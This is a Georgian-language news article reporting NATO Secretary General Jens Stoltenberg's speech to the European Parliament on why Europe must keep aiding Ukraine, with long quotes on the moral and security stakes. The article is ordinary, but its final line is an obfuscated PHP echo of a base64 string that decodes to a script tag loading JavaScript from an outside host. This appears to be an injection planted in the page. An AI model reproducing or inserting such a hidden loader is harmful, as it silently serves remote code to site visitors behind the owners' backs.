celsiusi
ავერსი შნაიდერი
უკრაინის დახმარების მნიშვნელობაზე ნატოს გენერალურმა მდივანმა გასულ კვირას, ევროპარლამენტში, ევროპარლამენატრებისთვის სიტყვით მიმართვისას ისაუბრა.
 
იენს სტოლტენბერგმა ემოციურად ახსნა, რატომ არ უნდა დაიღალოს ევროპა და მსოფლიო უკრაინის ომით და არ უნდა შეწტყვიტოს მისი დახმარება. სტოლტენბერგის თქმით, ამ დახმარებისთვის ეს ქვეყნები გარკვულ საფასურს იხდიან, თუმცა იხდიან ეკონომიკურად, განსხვავებით უკრაინელებისგან, რომლებიც ამ საფასურს საკუთარი სისხლით იხდიან. 
 
"უკრაინას თუ არ დავეხმარებით, გაცილებით დიდი ფასის გადახდა მოგვიწევს ნაწილობრივ იმიტომ, რომ ჩემთვის ეს მორალის საკითხია. დამოუკიდებელ, სუვერენულ ქვეყანას ევროპაში, სადაც 40 მილიონზე მეტი ადამიანი ცხოვრობს, თავს ესხმის დიდი სახელმწიფო რუსეთი. თუ არ გექნება რეაქცია იმაზე, რაც მოხდა ბუჩაში და სხვა ადგილებში, ეს ანგრევს იმას, რაც არის ჩემი წარმოდგენა უკრაინის წესიერი, პატიოსანი მეზობლების და მეგობრების ქცევის შესახებ. ასე, რომ დიახ, ფასის გადახდა გვიწევს, მაგრამ უკრაინის არდახმარება და იმის დაშვება, რომ ეს სისასტიკე გაგრძელდეს, კიდევ უფრო დიდი საფასურის გადახდას გვაიძულებს" ამბობს სტოლტენბერგი.
 
ნატოს გენერალური მდივნის თქმით, უკრაინის დამარცხება საფრთხე იქნება ევროპისთვის. მან გაიხსენა რუსეთის აგრესია 2008 წელს საქართველოში, რასაც 2014 წელს ყირიმი და დონბასი მოჰყვა:
 
"უნდა გვესმოდეს, რომ თუ უკრაინა დამარცხდება, ეს არის საფრთხე ჩვენთვის. ევროპა უფრო დაუცველ გახდება რუსული აგრესიის წინაშე. იმ გაკვეთილებით, რაც ჩვენ ვისწავლეთ რუსეთის მიერ,  2008 წელს საქართველოზე თავდასხმით, 2014 წელს ყირიმის ანექსიით, იმავე 2014 წელს დონბასში სიტუაციის არევით და შემდეგ ომის დაწყებით, არის ის, რომ რუსეთს ნებისმიერ დროს შეუძლია ძალის გამოყენება. ისინი ხელახლა ამყარებენ გავლენის სფეროების იდეას, როდესაც დიდი ქვეყნები წყვეტენ, რისი გაკეთება შეუძლიათ პატარა ქვეყნებს. ამით ჩვენ უფრო დაუცველები ვხდებით. ასე, რომ თუნდაც მხარს არ უჭერდე უკრაინის მხარდაჭერის ამ მორალურ ასპექტს, საკუთარი უსაფრთხოება მაინც ხომ უნდა განაღვლებდეს?!
 
ასე რომ დიახ, ფასი უნდა გადაიხადო, უნდა გადაიხადო მხარდაჭერისთვის, უნდა გადაიხადო ჰუმანიტარულ დახმარებაში, ეკონომიკური სანქციების ფასიც უნდა გადაიხადო იმიტომ რომ ალტერნატივა არის უფრო დიდი ფასის გადახდა მოგვიანებით და დაიმახსოვრეთ ერთი რამ, ჩვენ ფასს ვიხდით, მაგრამ ჩვენი, როგორც ევროკავშირისა და ნატოს მიერ გადახდილი საფასური იზომება ფულში, უკრაინელების მიერ გადახდილი საფასური კი იზომება ყოველდღიურად დაღუპული ადამიანების სიცოცხლეებით. ასე რომ უბრალოდ უნდა შეწყვიტო პრეტენზიები და დაეხმარო უკრაინას, წერტილი" თქვა იენს სტოლტენბერგმა სიტყვით გამოსვლისას. 
548
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");